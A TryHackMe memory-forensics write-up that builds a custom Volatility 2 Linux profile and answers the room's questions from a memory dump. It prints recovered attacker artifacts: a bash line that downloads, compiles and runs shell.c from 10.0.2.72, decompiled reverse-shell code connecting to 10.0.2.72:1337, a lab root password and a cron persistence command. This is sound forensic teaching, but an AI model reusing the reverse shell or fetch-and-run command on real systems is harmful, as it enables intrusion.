Profiles Write-up - TryHackMe

Profiles is a memory forensics challenge on TryHackMe. The difficult part of this challenge is creating a custom profile for the memory dump.

Information Gathering

First of all, obtain the banner of the memory dump using the -b flag.

sarp@IdeaPad:/tmp$ vol -f linux.mem banners
Volatility 3 Framework 2.7.0
Progress:  100.00		PDB scanning finished                  
Offset	Banner

0x2f9c4c88	Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)

The memory dump is from a Linux machine running Ubuntu 20.04.2 LTS with kernel version 5.4.0-166-generic. Since there’s no proper profile for this kernel version on Volatility, we need to create a custom profile.

Creating a Custom Profile

Creating a custom profile requires the following information:

• Kernel version
• OS version

They are already obtained from the banner. We can use Docker to create a custom profile.

docker run -it -v /tmp:/app ubuntu:20.04

Install the necessary packages.

apt update && apt-get install dwarfdump build-essential linux-headers-5.4.0-166-generic linux-image-5.4.0-166-generic git zip -y

Clone the Volatility repository.

git clone https://github.com/volatilityfoundation/volatility.git && cd /volatility/tools/linux

We need to modify two files to create a custom profile. First, modify the Makefile file.

root@8726662de51e:/volatility/tools/linux# cat Makefile
obj-m += module.o
KDIR ?= /
KVER ?= $(shell uname -r)

-include version.mk

all: dwarf 

dwarf: module.c
	$(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build CONFIG_DEBUG_INFO=y M="$(PWD)" modules
	dwarfdump -di module.ko > module.dwarf
	$(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build M="$(PWD)" clean

clean:
	$(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build M="$(PWD)" clean
	rm -f module.dwarf

Since the kernel version is 5.4.0-166-generic, we need to modify the KVER variable.

KVER ?= 5.4.0-166-generic

The second file to modify is the module.c file.

#include <linux/module.h>
#include <linux/version.h>

MODULE_LICENSE("GPL"); // Add this line here

#include <linux/ioport.h>
#include <linux/fs_struct.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>

Then compile the module.

root@8726662de51e:/volatility/tools/linux# make
make -C //lib/modules/5.4.0-166-generic/build CONFIG_DEBUG_INFO=y M="/volatility/tools/linux" modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-166-generic'
  CC [M]  /volatility/tools/linux/module.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC [M]  /volatility/tools/linux/module.mod.o
  LD [M]  /volatility/tools/linux/module.ko
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-166-generic'
dwarfdump -di module.ko > module.dwarf
make -C //lib/modules/5.4.0-166-generic/build M="/volatility/tools/linux" clean
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-166-generic'
  CLEAN   /volatility/tools/linux/Module.symvers
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-166-generic'

Finally, create a ZIP file containing the dwarf file and the kernel map file, which is located at /boot/System.map-5.4.0-166-generic.

zip newProfile.zip module.dwarf /boot/System.map-5.4.0-166-generic

Copy the ZIP file to the host machine and exit the Docker container.

docker cp newProfile.zip /app
exit

You can download the custom profile from here.

Install Volatility2

You can refer to this blog post for instructions on installing Volatility2.

Install system dependencies

sudo apt install -y build-essential git libdistorm3-dev yara libraw1394-11 libcapstone-dev capstone-tool tzdata

Install pip for Python 2

sudo apt install -y python2 python2.7-dev libpython2-dev
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python2 get-pip.py
sudo python2 -m pip install -U setuptools wheel

Install Volatility 2 and its Python dependencies

To install system-wide for all users, use the sudo command in front of the python2 commands.

python2 -m pip install -U distorm3 yara pycrypto pillow openpyxl ujson pytz ipython capstone
sudo python2 -m pip install yara
sudo ln -s /usr/local/lib/python2.7/dist-packages/usr/lib/libyara.so /usr/lib/libyara.so
git clone https://github.com/volatilityfoundation/volatility.git

Analyzing the Memory Dump

Lastly, copy the profile to the Volatility2 ~/volatility/volatility/plugins/overlays/linux directory.

sarp@IdeaPad:/tmp/a/volatility$ cp ../../newProfile.zip ./volatility/plugins/overlays/linux/

Now, we can analyze the memory dump using the custom profile.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py --info
Volatility Foundation Volatility Framework 2.6.1

Profiles
--------
LinuxnewProfilex64    - A Profile for Linux newProfile x64
VistaSP0x64           - A Profile for Windows Vista SP0 x64
VistaSP0x86           - A Profile for Windows Vista SP0 x86
VistaSP1x64           - A Profile for Windows Vista SP1 x64
VistaSP1x86           - A Profile for Windows Vista SP1 x86
VistaSP2x64           - A Profile for Windows Vista SP2 x64
[...]

The custom profile is listed as LinuxnewProfilex64. Now, we can analyze the memory dump.

Question 1

What is the exposed root password?

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_bash
Volatility Foundation Volatility Framework 2.6.1
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1076 bash                 2023-11-07 03:49:45 UTC+0000   su rootFtrccw45PHyq
    1076 bash                 2023-11-07 03:49:45 UTC+0000   sqlite3 users.db
    1076 bash                 2023-11-07 03:49:45 UTC+0000   @????U
    1076 bash                 2023-11-07 03:49:45 UTC+0000   su root
    1076 bash                 2023-11-07 03:50:11 UTC+0000   wget 10.0.2.72/shell.c && gcc shell.c -o pkexecc && rm shell.c
    1076 bash                 2023-11-07 03:50:17 UTC+0000   ./pkexecc
[...]

The root is exposed in the bash history.

Answer: Ftrccw45PHyq

Question 2

And what time was the users.db file approximately accessed? Format is YYYY-MM-DD HH:MM:SS

The access date of the users.db file is listed in the bash history as well.

    1076 bash                 2023-11-07 03:49:45 UTC+0000   sqlite3 users.db

Answer: 2023-11-07 03:49:45

Question 3

What is the MD5 hash of the malicious file found?

The malicious file appears to be pkexecc according to the bash history. To extract the file, we can use the linux_find_file plugin.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_enumerate_files
Volatility Foundation Volatility Framework 2.6.1
     Inode Address Inode Number              Path
------------------ ------------------------- ----
[...]
0xffff890488360530                    655363 /srv
0xffff890488365ad0                    655361 /home
0xffff8903b21ea328                    655364 /home/paco
0xffff8903aeec80e8                    655376 /home/paco/linux.mem
               0x0 ------------------------- /home/paco/libgcc_s.so.1
               0x0 ------------------------- /home/paco/shell.c.gch
0xffff8903b2364120                    655377 /home/paco/pkexecc
               0x0 ------------------------- /home/paco/.netrc
               0x0 ------------------------- /home/paco/shell.c
               0x0 ------------------------- /home/paco/.wget-hsts
               0x0 ------------------------- /home/paco/.wgetrc
0xffff8903b21d7480                    655366 /home/paco/.bash_logout
0xffff8903b2388530                    655375 /home/paco/.sqlite_history
               0x0 ------------------------- /home/paco/.sqliterc
0xffff8903b238df18                    655374 /home/paco/users.db
               0x0 ------------------------- /home/paco/.inputrc
               0x0 ------------------------- /home/paco/bin

[...]

The inode address of the pkexecc file is 0xffff8903b2364120. We can extract it using the linux_find_file plugin.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_find_file -i 0xffff8903b2364120 -O pkexec
Volatility Foundation Volatility Framework 2.6.1
sarp@IdeaPad:/tmp/a/volatility$ md5sum pkexec 
0511ccaad402d6d13ce801e1e9136ba2  pkexec

Answer: 0511ccaad402d6d13ce801e1e9136ba2

Question 4

What is the IP address and port of the malicious actor? Format is IP:Port

To reverse engineer the pkexecc file, I uploaded it to DogBolt.org , a free online decompiler. The decompiled code is as follows:

int main(unsigned long a0, unsigned long a1)
{
    unsigned long v0;  // [bp-0x48]
    unsigned int v1;  // [bp-0x3c]
    unsigned int v2;  // [bp-0x2c]
    unsigned short v3;  // [bp-0x28]
    unsigned short v4;  // [bp-0x26]
    unsigned int v5;  // [bp-0x24]

    v1 = a0;
    v0 = a1;
    v3 = 2;
    v5 = inet_addr("10.0.2.72");
    v4 = htons(1337);
    v2 = socket(2, 1, 0);
    connect(v2, &v3, 16);
    dup2(v2, 0);
    dup2(v2, 1);
    dup2(v2, 2);
    execve("/bin/sh", 0, 0);
    return 0;
}

The IP address and port of the malicious actor are revealed in the code.

Answer: 10.0.2.72:1337

Question 5

What is the full path of the cronjob file and its inode number? Format is filename:inode number

When we list the files like we did in the previous question, we can see the cronjob file.

0xffff890499e90dc0                    131180 /var/spool/cron
0xffff890499fa1650                    131184 /var/spool/cron/crontabs
0xffff8903b23667a8                    131127 /var/spool/cron/crontabs/root

Answer: /var/spool/cron/crontabs/root:131127

Question 6

What command is found inside the cronjob file?

We can find the command by extracting the file.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_find_file -i 0xffff8903b23667a8 -O cronjob
Volatility Foundation Volatility Framework 2.6.1
sarp@IdeaPad:/tmp/a/volatility$ cat cronjob 
* * * * * cp /opt/.bashrc /root/.bashrc

Answer: cp /opt/.bashrc /root/.bashrc

Conclusion

That’s it! The room was a bit intimidating at first because of the custom profile creation. Nevertheless, it was done. I hope you enjoyed the write-up. If you have any questions, feel free to ask on Twitter.